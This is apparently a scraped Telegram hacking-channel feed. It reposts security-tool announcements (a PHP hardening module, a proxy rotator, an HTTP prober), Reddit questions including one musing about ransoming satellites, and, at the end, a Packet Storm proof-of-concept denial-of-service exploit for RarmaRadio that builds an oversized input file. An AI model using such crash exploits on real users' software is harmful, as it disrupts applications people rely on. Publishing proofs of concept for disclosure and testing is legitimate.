Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
5 Reasons Why Web Security Matters

You might lead an active online life. Perhaps you spend a ton of time on sites like YouTube, Facebook, or Reddit. You might watch videos, post to social media, chat with your friends, or shop on sites like Etsy, eBay, and Amazon. This sounds like the average American these days. More people have internet access […]

The post 5 Reasons Why Web Security Matters appeared first on Kali Linux Tutorials.

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Snuffleupagus : Security Module For Php7 And Php8 – Killing Bugclasses And Virtual-Patching The Rest

Snuffleupagus is a PHP 7+ and 8+ module designed to drastically raise the cost of attacks against websites, by killing entire bug classes. It also provides a powerful virtual-patching system, allowing administrator to fix specific vulnerabilities and audit suspicious behaviours without having to touch the PHP code. Key Features No noticeable performance impact Powerful yet simple to write […]

The post Snuffleupagus : Security Module For Php7 And Php8 – Killing Bugclasses And Virtual-Patching The Rest appeared first on Kali Linux Tutorials.

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Mubeng : An Incredibly Fast Proxy Checker And IP Rotator With Ease

Mubeng is an incredibly fast proxy checker & IP rotator with ease. Features Proxy IP rotator: Rotates your IP address for every specific request. Proxy checker: Check your proxy IP which is still alive. All HTTP/S methods are supported. HTTP & SOCKSv5 proxy protocols apply. All parameters & URIs are passed. Easy to use: You can just […]

The post Mubeng : An Incredibly Fast Proxy Checker And IP Rotator With Ease appeared first on Kali Linux Tutorials.

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
HTTPX : A Fast And Multi-Purpose HTTP Toolkit

HTTPX is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads. Features Simple and modular code base making it easy to contribute. Fast And fully configurable flags to probe mutiple elements. Supports multiple HTTP based probings. Smart auto fallback from https […]

The post HTTPX : A Fast And Multi-Purpose HTTP Toolkit appeared first on Kali Linux Tutorials.

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
Satellites

Has anyone ever taken over a satellite and ransomed it or used it against an adversary outside of penetration tests? It's probably easier to shoot them down but missles are expensive. I'm just tired of having to wear a Faraday cage around my head so I don't get programmed like the rest of you📡🛰️🏴‍☠️

submitted by /u/FullDeadQuiet
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
I want to hack tesvor x500

Hello there,

I know, the title might be misunderstood, but I don't know how to title my project.

I want to hack the Soundfiles on my Tesvor x500. I just want to swap them out, when there are existing Sounds for "charging started" or "intelligent cleaning".

Is there any possibility to "hack" myself in this robot via Wifi and swap some data?

When this is not the right subreddit, please point this out to me.

submitted by /u/Amorphiris
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
RarmaRadio 2.72.8 Denial Of Service

https://3.bp.blogspot.com/-Gb5I5b_xjQ0/WWlu86s-SoI/AAAAAAAAIJk/Vrr0JqyMe7wOp_97KyfJoVRHnDW4ZjPNwCLcBGAs/s1600/h112.png
RarmaRadio version 2.72.8 denial of service proof of concept exploit.

MD5 | e3972881c8a84c8b53c0c3119a4c0df4

Download
# Exploit Title: RarmaRadio 2.72.8 - Denial of Service (PoC)
# Date: 2021-05-25
# Exploit Author: Ismael Nava
# Vendor Homepage: http://www.raimersoft.com/
# Software Link: http://raimersoft.com/downloads/rarmaradio_setup.exe
# Version: 2.75.8
# Tested on: Windows 10 Home x64

#STEPS
# Open the program RarmaRadio
# Click in Edit and select Settings
# Click in Network option
# Run the python exploit script, it will create a new .txt files
# Copy the content of the file "Lambda.txt"
# Paste the content in the fields Username, Server, Port and User Agent
# Click in OK
# End :)
buffer = 'Ñ' * 100000

try:
file = open("Lambda.txt","w")
file.write(buffer)
file.close()

print("Archive ready")
except:
print("Archive no ready")


Source:packetstormsecurity.com